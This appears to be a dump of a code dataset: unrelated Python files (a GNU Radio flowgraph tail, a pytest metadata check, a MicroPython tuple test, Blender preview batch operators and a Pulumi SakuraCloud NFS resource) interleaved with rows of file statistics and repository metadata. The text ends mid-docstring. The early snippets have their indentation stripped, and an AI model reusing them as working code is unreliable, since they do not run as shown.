self.qtgui_time_sink_x_0_0_0.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0_0.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0.set_samp_rate(self.samp_rate)
self.qtgui_freq_sink_x_0_1_0.set_frequency_range(0, self.samp_rate)
self.qtgui_freq_sink_x_0_1.set_frequency_range(0, self.samp_rate)
self.qtgui_freq_sink_x_0_0.set_frequency_range(0, self.samp_rate)
self.qtgui_freq_sink_x_0.set_frequency_range(0, self.samp_rate)
self.blocks_throttle_3.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_2.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_1.set_sample_rate(self.samp_rate /self.throttle)
self.blocks_throttle_0.set_sample_rate(self.samp_rate / self.throttle)
def get_nfft(self):
return self.nfft
def set_nfft(self, nfft):
self.nfft = nfft
self.qtgui_time_sink_x_1.set_samp_rate(self.samp_rate / self.nfft)
self.blocks_add_const_vxx_0_0_0.set_k((-self.nfft / 2, ))
self.blocks_add_const_vxx_0_0.set_k((-self.nfft / 2, ))
self.blocks_add_const_vxx_0.set_k((-self.nfft / 2, ))
def get_delay_3(self):
return self.delay_3
def set_delay_3(self, delay_3):
self.delay_3 = delay_3
Qt.QMetaObject.invokeMethod(self._delay_3_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_3)))
self.blocks_delay_3.set_dly(self.delay_3)
self.blocks_add_const_vxx_1_0_0.set_k((float(self.delay_3), ))
def get_delay_2(self):
return self.delay_2
def set_delay_2(self, delay_2):
self.delay_2 = delay_2
Qt.QMetaObject.invokeMethod(self._delay_2_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_2)))
self.blocks_delay_2.set_dly(self.delay_2)
self.blocks_add_const_vxx_1_0.set_k((float(self.delay_2), ))
def get_delay_1(self):
return self.delay_1
def set_delay_1(self, delay_1):
self.delay_1 = delay_1
Qt.QMetaObject.invokeMethod(self._delay_1_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_1)))
self.blocks_delay_1.set_dly(self.delay_1)
self.blocks_add_const_vxx_1.set_k((float(self.delay_1), ))
def get_delay_0(self):
return self.delay_0
def set_delay_0(self, delay_0):
self.delay_0 = delay_0
Qt.QMetaObject.invokeMethod(self._delay_0_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_0)))
self.blocks_delay_0.set_dly(self.delay_0)
def get_corr_alpha_0_3(self):
return self.corr_alpha_0_3
def set_corr_alpha_0_3(self, corr_alpha_0_3):
self.corr_alpha_0_3 = corr_alpha_0_3
Qt.QMetaObject.invokeMethod(self._corr_alpha_0_3_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_3)))
self.single_pole_iir_filter_xx_0_0_0.set_taps(self.corr_alpha_0_3)
def get_corr_alpha_0_2(self):
return self.corr_alpha_0_2
def set_corr_alpha_0_2(self, corr_alpha_0_2):
self.corr_alpha_0_2 = corr_alpha_0_2
Qt.QMetaObject.invokeMethod(self._corr_alpha_0_2_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_2)))
self.single_pole_iir_filter_xx_0_0.set_taps(self.corr_alpha_0_2)
def get_corr_alpha_0_1(self):
return self.corr_alpha_0_1
def set_corr_alpha_0_1(self, corr_alpha_0_1):
self.corr_alpha_0_1 = corr_alpha_0_1
Qt.QMetaObject.invokeMethod(self._corr_alpha_0_1_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_1)))
self.single_pole_iir_filter_xx_0.set_taps(self.corr_alpha_0_1)
def main(top_block_cls=kerberos_sigmf_playback3, options=None):
from distutils.version import StrictVersion
if StrictVersion(Qt.qVersion()) >= StrictVersion("4.5.0"):
style = gr.prefs().get_string('qtgui', 'style', 'raster')
Qt.QApplication.setGraphicsSystem(style)
qapp = Qt.QApplication(sys.argv)
tb = top_block_cls()
tb.start()
tb.show()
def quitting():
tb.stop()
tb.wait()
qapp.connect(qapp, Qt.SIGNAL("aboutToQuit()"), quitting)
qapp.exec_()
if __name__ == '__main__':
main()
| 53.197166 | 196 | 0.656698 | 15,305 | 90,116 | 3.409213 | 0.024175 | 0.03833 | 0.027655 | 0.091878 | 0.936199 | 0.90864 | 0.870405 | 0.837709 | 0.800606 | 0.755702 | 0 | 0.067473 | 0.217975 | 90,116 | 1,693 | 197 | 53.228588 | 0.672924 | 0.009099 | 0 | 0.348026 | 0 | 0.002632 | 0.034777 | 0.00428 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.000658 | 0.014474 | null | null | 0.000658 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fa3d4f03ac6fa7bde91e6a22a3146525c20072ae | 208 | py | Python | src/raspberrypi_video_loop/tests/test_raspberrypi_video_loop.py | linuxluigi/RaspberryPi_video_loop | de2bef45e39304e1bf5a6d9ee8b08db16fefcca7 | [
"MIT"
] | null | null | null | src/raspberrypi_video_loop/tests/test_raspberrypi_video_loop.py | linuxluigi/RaspberryPi_video_loop | de2bef45e39304e1bf5a6d9ee8b08db16fefcca7 | [
"MIT"
] | null | null | null | src/raspberrypi_video_loop/tests/test_raspberrypi_video_loop.py | linuxluigi/RaspberryPi_video_loop | de2bef45e39304e1bf5a6d9ee8b08db16fefcca7 | [
"MIT"
] | null | null | null | import pytest
import raspberrypi_video_loop
def test_project_defines_author_and_version():
assert hasattr(raspberrypi_video_loop, '__author__')
assert hasattr(raspberrypi_video_loop, '__version__')
| 26 | 57 | 0.831731 | 25 | 208 | 6.16 | 0.56 | 0.311688 | 0.38961 | 0.376623 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105769 | 208 | 7 | 58 | 29.714286 | 0.827957 | 0 | 0 | 0 | 0 | 0 | 0.100962 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.2 | true | 0 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
d70e4cf569d0c1110b1fe8e7ad024d74b02378a6 | 183 | py | Python | tests/bytecode/mp-tests/tuple1.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 303 | 2015-07-11T17:12:55.000Z | 2018-01-08T03:02:37.000Z | tests/bytecode/mp-tests/tuple1.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 13 | 2016-05-12T16:51:22.000Z | 2018-01-10T22:33:25.000Z | tests/bytecode/mp-tests/tuple1.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 26 | 2018-01-18T09:15:33.000Z | 2022-02-07T13:09:14.000Z | x = ()
x = a
x = a,
x = a, 2
x = a, 2,
x = a, 2, 3
x = a, 2, 3, 4
x = a, 2, 3, 4, 5
x = ()
x = (a)
x = (a,)
x = (a, 2)
x = (a, 2,)
x = (a, 2, 3)
x = (a, 2, 3, 4)
x = (a, 2, 3, 4, 5)
| 10.166667 | 19 | 0.284153 | 52 | 183 | 1 | 0.115385 | 0.538462 | 0.576923 | 0.461538 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0.196429 | 0.387978 | 183 | 17 | 20 | 10.764706 | 0.267857 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
d710b9af7152e9312dae5de3fe5c2a7b2da8ff1c | 8,387 | py | Python | blender/2.79/scripts/startup/bl_operators/file.py | uzairakbar/bpy2.79 | 3a3e0004ac6783c4e4b89d939e4432de99026a85 | [
"MIT"
] | 2 | 2019-11-27T09:05:42.000Z | 2020-02-20T01:25:23.000Z | blender/2.79/scripts/startup/bl_operators/file.py | uzairakbar/bpy2.79 | 3a3e0004ac6783c4e4b89d939e4432de99026a85 | [
"MIT"
] | null | null | null | blender/2.79/scripts/startup/bl_operators/file.py | uzairakbar/bpy2.79 | 3a3e0004ac6783c4e4b89d939e4432de99026a85 | [
"MIT"
] | 4 | 2020-02-19T20:02:26.000Z | 2022-02-11T18:47:56.000Z | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
from bpy.types import Operator
from bpy.props import (
StringProperty,
BoolProperty,
CollectionProperty,
)
# ########## Datablock previews... ##########
class WM_OT_previews_batch_generate(Operator):
"""Generate selected .blend file's previews"""
bl_idname = "wm.previews_batch_generate"
bl_label = "Batch-Generate Previews"
bl_options = {'REGISTER'}
# -----------
# File props.
files = CollectionProperty(
type=bpy.types.OperatorFileListElement,
options={'HIDDEN', 'SKIP_SAVE'},
)
directory = StringProperty(
maxlen=1024,
subtype='FILE_PATH',
options={'HIDDEN', 'SKIP_SAVE'},
)
# Show only images/videos, and directories!
filter_blender = BoolProperty(
default=True,
options={'HIDDEN', 'SKIP_SAVE'},
)
filter_folder = BoolProperty(
default=True,
options={'HIDDEN', 'SKIP_SAVE'},
)
# -----------
# Own props.
use_scenes = BoolProperty(
default=True,
name="Scenes",
description="Generate scenes' previews",
)
use_groups = BoolProperty(
default=True,
name="Groups",
description="Generate groups' previews",
)
use_objects = BoolProperty(
default=True,
name="Objects",
description="Generate objects' previews",
)
use_intern_data = BoolProperty(
default=True,
name="Mat/Tex/...",
description="Generate 'internal' previews (materials, textures, images, etc.)",
)
use_trusted = BoolProperty(
default=False,
name="Trusted Blend Files",
description="Enable python evaluation for selected files",
)
use_backups = BoolProperty(
default=True,
name="Save Backups",
description="Keep a backup (.blend1) version of the files when saving with generated previews",
)
def invoke(self, context, event):
context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
def execute(self, context):
import os
import subprocess
from bl_previews_utils import bl_previews_render as preview_render
context.window_manager.progress_begin(0, len(self.files))
context.window_manager.progress_update(0)
for i, fn in enumerate(self.files):
blen_path = os.path.join(self.directory, fn.name)
cmd = [
bpy.app.binary_path,
"--background",
"--factory-startup",
"-noaudio",
]
if self.use_trusted:
cmd.append("--enable-autoexec")
cmd.extend([
blen_path,
"--python",
os.path.join(os.path.dirname(preview_render.__file__), "bl_previews_render.py"),
"--",
])
if not self.use_scenes:
cmd.append('--no_scenes')
if not self.use_groups:
cmd.append('--no_groups')
if not self.use_objects:
cmd.append('--no_objects')
if not self.use_intern_data:
cmd.append('--no_data_intern')
if not self.use_backups:
cmd.append("--no_backups")
if subprocess.call(cmd):
self.report({'ERROR'}, "Previews generation process failed for file '%s'!" % blen_path)
context.window_manager.progress_end()
return {'CANCELLED'}
context.window_manager.progress_update(i + 1)
context.window_manager.progress_end()
return {'FINISHED'}
class WM_OT_previews_batch_clear(Operator):
"""Clear selected .blend file's previews"""
bl_idname = "wm.previews_batch_clear"
bl_label = "Batch-Clear Previews"
bl_options = {'REGISTER'}
# -----------
# File props.
files = CollectionProperty(
type=bpy.types.OperatorFileListElement,
options={'HIDDEN', 'SKIP_SAVE'},
)
directory = StringProperty(
maxlen=1024,
subtype='FILE_PATH',
options={'HIDDEN', 'SKIP_SAVE'},
)
# Show only images/videos, and directories!
filter_blender = BoolProperty(
default=True,
options={'HIDDEN', 'SKIP_SAVE'},
)
filter_folder = BoolProperty(
default=True,
options={'HIDDEN', 'SKIP_SAVE'},
)
# -----------
# Own props.
use_scenes = BoolProperty(
default=True,
name="Scenes",
description="Clear scenes' previews",
)
use_groups = BoolProperty(default=True,
name="Groups",
description="Clear groups' previews",
)
use_objects = BoolProperty(
default=True,
name="Objects",
description="Clear objects' previews",
)
use_intern_data = BoolProperty(
default=True,
name="Mat/Tex/...",
description="Clear 'internal' previews (materials, textures, images, etc.)",
)
use_trusted = BoolProperty(
default=False,
name="Trusted Blend Files",
description="Enable python evaluation for selected files",
)
use_backups = BoolProperty(
default=True,
name="Save Backups",
description="Keep a backup (.blend1) version of the files when saving with cleared previews",
)
def invoke(self, context, event):
context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
def execute(self, context):
import os
import subprocess
from bl_previews_utils import bl_previews_render as preview_render
context.window_manager.progress_begin(0, len(self.files))
context.window_manager.progress_update(0)
for i, fn in enumerate(self.files):
blen_path = os.path.join(self.directory, fn.name)
cmd = [
bpy.app.binary_path,
"--background",
"--factory-startup",
"-noaudio",
]
if self.use_trusted:
cmd.append("--enable-autoexec")
cmd.extend([
blen_path,
"--python",
os.path.join(os.path.dirname(preview_render.__file__), "bl_previews_render.py"),
"--",
"--clear",
])
if not self.use_scenes:
cmd.append('--no_scenes')
if not self.use_groups:
cmd.append('--no_groups')
if not self.use_objects:
cmd.append('--no_objects')
if not self.use_intern_data:
cmd.append('--no_data_intern')
if not self.use_backups:
cmd.append("--no_backups")
if subprocess.call(cmd):
self.report({'ERROR'}, "Previews clear process failed for file '%s'!" % blen_path)
context.window_manager.progress_end()
return {'CANCELLED'}
context.window_manager.progress_update(i + 1)
context.window_manager.progress_end()
return {'FINISHED'}
classes = (
WM_OT_previews_batch_clear,
WM_OT_previews_batch_generate,
) | 32.890196 | 107 | 0.560391 | 847 | 8,387 | 5.386068 | 0.242031 | 0.066637 | 0.070583 | 0.059185 | 0.824638 | 0.796142 | 0.783867 | 0.783867 | 0.783867 | 0.783867 | 0 | 0.00517 | 0.331227 | 8,387 | 255 | 108 | 32.890196 | 0.808165 | 0.123763 | 0 | 0.725888 | 0 | 0 | 0.184844 | 0.012515 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020305 | false | 0 | 0.045685 | 0 | 0.238579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d713448ab84e59f1822c47920ef387e3c7ffd44f | 21,878 | py | Python | sdk/python/pulumi_sakuracloud/nfs.py | sacloud/pulumi-sakuracloud | 3eff14c6ec8ef4ad6422e0cdf15585df67eb4d6e | [
"ECL-2.0",
"Apache-2.0"
] | 6 | 2019-12-07T07:46:05.000Z | 2020-12-19T02:41:42.000Z | sdk/python/pulumi_sakuracloud/nfs.py | sacloud/pulumi-sakuracloud | 3eff14c6ec8ef4ad6422e0cdf15585df67eb4d6e | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2019-09-11T04:41:06.000Z | 2021-10-19T07:50:34.000Z | sdk/python/pulumi_sakuracloud/nfs.py | sacloud/pulumi-sakuracloud | 3eff14c6ec8ef4ad6422e0cdf15585df67eb4d6e | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2019-09-08T05:38:16.000Z | 2021-06-24T01:32:47.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['NFSArgs', 'NFS']
@pulumi.input_type
class NFSArgs:
def __init__(__self__, *,
network_interface: pulumi.Input['NFSNetworkInterfaceArgs'],
description: Optional[pulumi.Input[str]] = None,
icon_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
plan: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a NFS resource.
:param pulumi.Input['NFSNetworkInterfaceArgs'] network_interface: An `network_interface` block as defined below.
:param pulumi.Input[str] description: The description of the NFS. The length of this value must be in the range [`1`-`512`].
:param pulumi.Input[str] icon_id: The icon id to attach to the NFS.
:param pulumi.Input[str] name: The name of the NFS. The length of this value must be in the range [`1`-`64`].
:param pulumi.Input[str] plan: The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
:param pulumi.Input[int] size: The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Any tags to assign to the NFS.
:param pulumi.Input[str] zone: The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "network_interface", network_interface)
if description is not None:
pulumi.set(__self__, "description", description)
if icon_id is not None:
pulumi.set(__self__, "icon_id", icon_id)
if name is not None:
pulumi.set(__self__, "name", name)
if plan is not None:
pulumi.set(__self__, "plan", plan)
if size is not None:
pulumi.set(__self__, "size", size)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter(name="networkInterface")
def network_interface(self) -> pulumi.Input['NFSNetworkInterfaceArgs']:
"""
An `network_interface` block as defined below.
"""
return pulumi.get(self, "network_interface")
@network_interface.setter
def network_interface(self, value: pulumi.Input['NFSNetworkInterfaceArgs']):
pulumi.set(self, "network_interface", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the NFS. The length of this value must be in the range [`1`-`512`].
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="iconId")
def icon_id(self) -> Optional[pulumi.Input[str]]:
"""
The icon id to attach to the NFS.
"""
return pulumi.get(self, "icon_id")
@icon_id.setter
def icon_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "icon_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the NFS. The length of this value must be in the range [`1`-`64`].
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def plan(self) -> Optional[pulumi.Input[str]]:
"""
The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
"""
return pulumi.get(self, "plan")
@plan.setter
def plan(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "plan", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Any tags to assign to the NFS.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
@pulumi.input_type
class _NFSState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
icon_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_interface: Optional[pulumi.Input['NFSNetworkInterfaceArgs']] = None,
plan: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering NFS resources.
:param pulumi.Input[str] description: The description of the NFS. The length of this value must be in the range [`1`-`512`].
:param pulumi.Input[str] icon_id: The icon id to attach to the NFS.
:param pulumi.Input[str] name: The name of the NFS. The length of this value must be in the range [`1`-`64`].
:param pulumi.Input['NFSNetworkInterfaceArgs'] network_interface: An `network_interface` block as defined below.
:param pulumi.Input[str] plan: The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
:param pulumi.Input[int] size: The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Any tags to assign to the NFS.
:param pulumi.Input[str] zone: The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if icon_id is not None:
pulumi.set(__self__, "icon_id", icon_id)
if name is not None:
pulumi.set(__self__, "name", name)
if network_interface is not None:
pulumi.set(__self__, "network_interface", network_interface)
if plan is not None:
pulumi.set(__self__, "plan", plan)
if size is not None:
pulumi.set(__self__, "size", size)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the NFS. The length of this value must be in the range [`1`-`512`].
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="iconId")
def icon_id(self) -> Optional[pulumi.Input[str]]:
"""
The icon id to attach to the NFS.
"""
return pulumi.get(self, "icon_id")
@icon_id.setter
def icon_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "icon_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the NFS. The length of this value must be in the range [`1`-`64`].
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="networkInterface")
def network_interface(self) -> Optional[pulumi.Input['NFSNetworkInterfaceArgs']]:
"""
An `network_interface` block as defined below.
"""
return pulumi.get(self, "network_interface")
@network_interface.setter
def network_interface(self, value: Optional[pulumi.Input['NFSNetworkInterfaceArgs']]):
pulumi.set(self, "network_interface", value)
@property
@pulumi.getter
def plan(self) -> Optional[pulumi.Input[str]]:
"""
The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
"""
return pulumi.get(self, "plan")
@plan.setter
def plan(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "plan", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Any tags to assign to the NFS.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
class NFS(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
icon_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_interface: Optional[pulumi.Input[pulumi.InputType['NFSNetworkInterfaceArgs']]] = None,
plan: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a SakuraCloud NFS.
## Example Usage
```python
import pulumi
import pulumi_sakuracloud as sakuracloud
foobar_switch = sakuracloud.Switch("foobarSwitch")
foobar_nfs = sakuracloud.NFS("foobarNFS",
plan="ssd",
size=500,
network_interface=sakuracloud.NFSNetworkInterfaceArgs(
switch_id=foobar_switch.id,
ip_address="192.168.11.101",
netmask=24,
gateway="192.168.11.1",
),
description="description",
tags=[
"tag1",
"tag2",
])
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the NFS. The length of this value must be in the range [`1`-`512`].
:param pulumi.Input[str] icon_id: The icon id to attach to the NFS.
:param pulumi.Input[str] name: The name of the NFS. The length of this value must be in the range [`1`-`64`].
:param pulumi.Input[pulumi.InputType['NFSNetworkInterfaceArgs']] network_interface: An `network_interface` block as defined below.
:param pulumi.Input[str] plan: The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
:param pulumi.Input[int] size: The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Any tags to assign to the NFS.
:param pulumi.Input[str] zone: The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: NFSArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a SakuraCloud NFS.
## Example Usage
```python
import pulumi
import pulumi_sakuracloud as sakuracloud
foobar_switch = sakuracloud.Switch("foobarSwitch")
foobar_nfs = sakuracloud.NFS("foobarNFS",
plan="ssd",
size=500,
network_interface=sakuracloud.NFSNetworkInterfaceArgs(
switch_id=foobar_switch.id,
ip_address="192.168.11.101",
netmask=24,
gateway="192.168.11.1",
),
description="description",
tags=[
"tag1",
"tag2",
])
```
:param str resource_name: The name of the resource.
:param NFSArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NFSArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
icon_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_interface: Optional[pulumi.Input[pulumi.InputType['NFSNetworkInterfaceArgs']]] = None,
plan: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = NFSArgs.__new__(NFSArgs)
__props__.__dict__["description"] = description
__props__.__dict__["icon_id"] = icon_id
__props__.__dict__["name"] = name
if network_interface is None and not opts.urn:
raise TypeError("Missing required property 'network_interface'")
__props__.__dict__["network_interface"] = network_interface
__props__.__dict__["plan"] = plan
__props__.__dict__["size"] = size
__props__.__dict__["tags"] = tags
__props__.__dict__["zone"] = zone
super(NFS, __self__).__init__(
'sakuracloud:index/nFS:NFS',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
icon_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_interface: Optional[pulumi.Input[pulumi.InputType['NFSNetworkInterfaceArgs']]] = None,
plan: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None) -> 'NFS':
"""
Get an existing NFS resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the NFS. The length of this value must be in the range [`1`-`512`].
:param pulumi.Input[str] icon_id: The icon id to attach to the NFS.
:param pulumi.Input[str] name: The name of the NFS. The length of this value must be in the range [`1`-`64`].
